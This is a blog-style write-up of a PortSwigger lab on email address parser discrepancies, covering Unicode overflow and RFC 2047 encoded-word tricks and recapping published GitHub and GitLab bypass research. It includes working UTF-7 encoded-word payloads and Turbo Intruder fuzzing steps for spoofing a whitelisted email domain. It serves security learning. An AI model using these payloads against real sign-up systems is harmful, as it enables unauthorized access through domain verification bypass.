business logic vulnerabilities: Email address parser discrepancies
1. Introduction
While learning about business logic vulnerabilities in PortSwigger’s labs, I came across an interesting exploit: bypassing access controls by manipulating email parsers. This bug fascinated me because it shows how small inconsistencies in how systems parse email addresses can lead to serious security flaws.
In this post, I’ll break down how this vulnerability works, demonstrate it with a simple PortSwigger lab example, and explain its real-world impact. By the end, you’ll understand why email parsing discrepancies matter and how attackers can exploit them to gain unauthorized access.
2. Parser discrepancies
2.1 Unicode overflows
Many security systems block special characters (like @, ‘, “, or ;) in email fields to prevent injection attacks. attackers can bypass these filters by using Unicode characters that overflow into blocked ASCII characters when parsed.
example :
Some programming languages (like PHP’s chr()) normalize Unicode code points into the 0-255 range using a modulo 256 operation, effectively converting high Unicode values into standard ASCII.
1
chr(0x100 + 0x40) → chr(256 + 64) → chr(64) → '@'
1
2
3
4
5
6
7
8
examples :
'✨' === '('
'✩' === ')'
'✻' === ';'
'✼' === '<'
'✽' === '='
'✾' === '>'
'❀' === '@'
Conclusion
Unicode overflows expose a critical flaw: security filters often check for literal characters but miss their Unicode-encoded equivalents. Attackers exploit this by submitting high-code-point characters that normalize into blocked symbols (@, ‘, etc.), bypassing access controls.
2.2 Encoded-word
The encoded-word syntax from RFC 2047 is primarily used in email headers (Subject, From, To) to encode non-ASCII characters.
If we use an encoded email as an example illustration from whitepaper by Gareth Heyes:
- The “=?” indicates the start of an encoded-word .
- Specify the charset in this case UTF-8 .
- two ‘?’ for type of encoding : Q-Encoding ->
?q?
- Q-Encoding is simply hex with an equal prefix
=41=42=43
===ABC
. - ?= indicates the end of the encoding .
Methodology/Tooling
let’s talk about charset :
- we can the charset “x” to reduce the size of the probe but some systems reject unknown charsets and would fail.
GitHub Email Parser Exploit Bypassing Cloudflare Zero Trust (just using unknow charsets)
A critical vulnerability in GitHub’s email verification allowed attackers to bypass Cloudflare Zero Trust by exploiting RFC 2047 “encoded-word” parsing. By crafting a malicious email with:
1 2 3
=40 (encoded @) to split domains =3e (encoded >) to terminate SMTP commands =00 (null byte) to truncate validation
Root Cause: GitHub’s Ruby-based parser : Decoded encoded-word but failed to sanitize control chars and Processed the null-byte payload
Proof of Concept (PoC) by Researcher Gareth Heyes Security researcher Gareth Heyes successfully demonstrated how to verify unauthorized email domains on GitHub, including: microsoft.com, mozilla.com, github.com …
- charset “UTF-7”, “UTF-8”
example about UTF-7
Ruby’s Mail Gem
(508M+ downloads) Auto-decoded UTF-7 in emails, enabling email parser bypasses. Allowed attackers to hide malicious chars in seemingly “safe” input. - charset “iso-8859-1”
ISO-8859-1 Exploit in GitLab Enterprise Servers
GitLab’s parser auto-decoded ISO-8859-1 but failed to normalize the output, allowing control characters to slip through. It’s very similar to the Github exploit but it required a valid charset and needed space not null. In the diagram I used “x” but in a real attack you’d use “iso-8859-1”. Unlike GitHub’s null-byte trick, this relied on spaces/underscores to confuse validation.
Impact: Unauthorized access to GitLab Enterprise instances using domain whitelisting. IdP compromise when GitLab served as an identity provider.
3. Hands-On Practice in portswigger lab
Bypassing Access Controls via Email Address Parsing Discrepancies :
To access admin panel must have a email with domain ginandjuice.shop :
Investigate encoding discrepancies :
I test charset “x” (unknown charsets) , charset “iso-8859-1” and also utf-8 : I Notice that the registration is blocked with the error: “Registration blocked for security reasons.”
1
2
3
=?x?q?=61=62=63?=test@ginandjuice.shop
=?iso-8859-1?q?=61=62=63?=test@ginandjuice.shop.
=?utf-8?q?=61=62=63?=test@ginandjuice.shop
but when i test charset “utf-7” its work fine :
1
2
=?utf-7?q?&AGYAbwBvAGIAYQBy-?=@ginandjuice.shop
(UTF-7 encoded "foobar" -> foobar@ginandjuice.shop)
now we can use it to craft an attack that tricks the server into sending a confirmation email to your exploit server email address while appearing to still satisfy the ginandjuice.shop domain requirement.
1
2
3
4
@ -> &AEA-
Space -> &ACA-
Null -> &AAA-
Underscore -> &AF8-
Through extensive testing, I found that encoding spaces was the most effective approach for forcing parser inconsistencies.
1
2
=?utf-7?q?attacker&AEA-myemail.net&ACA-?=@ginandjuice.shop
(result: =?utf-7?q?attacker@myemail.net ?=@ginandjuice.shop)
In Email client, i get a registration validation email. This is because the encoded email address has passed validation due to the @ginandjuice.shop portion at the end, but the email server has interpreted the registration email as attacker@myemail.com
Automate exploitation of encoded-word with Turbo Intruder :
- first i replace value of email with %s.
- script i use for fuzzing : turbo-intruder-scripts.
- If you encounter applications with rate limits, change the REQUEST_SLEEP variable to play nicely with those servers.
- need to change the validServer variable to your target domain to spoof
- shouldUrlEncode = True
To use it you just need to change the validServer variable to your target domain to spoof. and we can easily customise the script to perform other attacks.
If the attack works you should receive a collaborator interaction within Turbo Intruder. This means the email domain is spoofable.
I sort by words and i get valid responde :
4. References & Resources
- Whitepaper by Gareth Heyes of the PortSwigger Research team : Link.
- lab for practice : Link.
- tools for fuzzing : Link.
- Turbo Intruder.